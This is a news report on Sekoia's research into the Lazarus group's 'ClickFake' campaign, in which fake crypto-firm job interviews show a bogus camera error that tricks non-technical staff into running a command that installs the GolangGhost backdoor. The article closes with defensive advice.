North Korean hackers adopt ClickFix attacks to target crypto firms

March 31, 2025

North Korea

The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi).

This development, reported by Sekoia, is seen as an evolution of the threat actor's 'Contagious Interview' campaign that similarly targets job seekers in the AI and cryptocurrency space.

ClickFix is a relatively new but increasingly common tactic where threat actors use fake errors on websites or documents indicating a problem viewing the content. The page then prompts the user to "fix" the issue by running PowerShell commands that download and execute the malware on the system.

Sekoia says that Lazarus impersonates numerous well-known companies in the latest campaign, including Coinbase, KuCoin, Kraken, Circle, Securitize, BlockFi, Tether, Robinhood, and Bybit, from which the North Korean threat actors recently stole a record $1.5 billion.

"By collecting data (i.e. JSON objects) included in all the fake interview websites we identified, we were able to determine which companies were unknowingly used as a lure for these fake interviews," explains Sekoia.

"Our analysis is based on 184 different invitations retrieved from fake interview websites. Among these invitations, we found 14 company names used to lure the victim into completing the application process."

Brand abuse in Lazarus operationsSource: Sekoia

Lazarus adopts ClickFix

In Contagious Interview, first documented in November 2023, Lazarus approaches targets on LinkedIn or X, presenting them with employment opportunities.

It then used software and coding test projects hosted on collaboration platforms like GitHub and Bitbucket to trick targets into downloading and running malware loaders on their systems, dropping info-stealers.

Starting in February 2025, Sekoia says Lazarus has started using so-called 'ClickFake' campaigns that employ ClickFix tactics to achieve the self-infection step, with the earlier phases of the attack remaining the same.

However, the researchers note that the Contagious Interview is still ongoing, indicating that the North Koreans possibly evaluate the effectiveness of the two techniques while running them in parallel.

In the ClickFake attacks, Lazarus switched focus from targeting developers and coders to people holding non-technical roles in CeFi companies, such as business developers and marketing managers.

These people are invited to a remote interview by following a link to a legitimate-appearing site built in ReactJS, featuring contact forms, open-ended questions, and a request for a video introduction.

When the target attempts to record the video using their webcam, a fake error appears, claiming a driver issue is preventing camera access and generating instructions on how to overcome the problem.

**Fake error served to targets***Source: Sekoia*

Based on the browser's User-Agent, the site delivers OS-specific instructions, supporting either Windows or macOS.

The victims are instructed to run a curl command in CMD (Windows) or Terminal (macOS) which infects them with a Go-based backdoor named 'GolangGhost' and establishes persistence via registry modification and LaunchAgent plist files.

**GolangGhost infection chains***Source: Sekoia*

Once deployed, GolangGhost connects to its command and control (C2) server, registers the newly infected device with a unique machine ID, and waits for commands.

The malware can perform file operations, shell command execution, steal Chrome cookies, browsing history, and stored passwords, and also harvest system metadata.

As Lazarus diversifies its attack methods, potential targets must remain vigilant and stay up-to-date with the latest developments, consistently verifying interview invitations before downloading or executing anything on their systems.

Never execute anything you have copied from the internet on the Windows Command Prompt or macOS Terminal, especially if you don't fully understand what it does.

Sekoia has also shared Yara rules that organizations can use to detect and block ClickFake activity in their environments, as well as a complete list of the indicators of compromise associated with the latest Lazarus campaigns.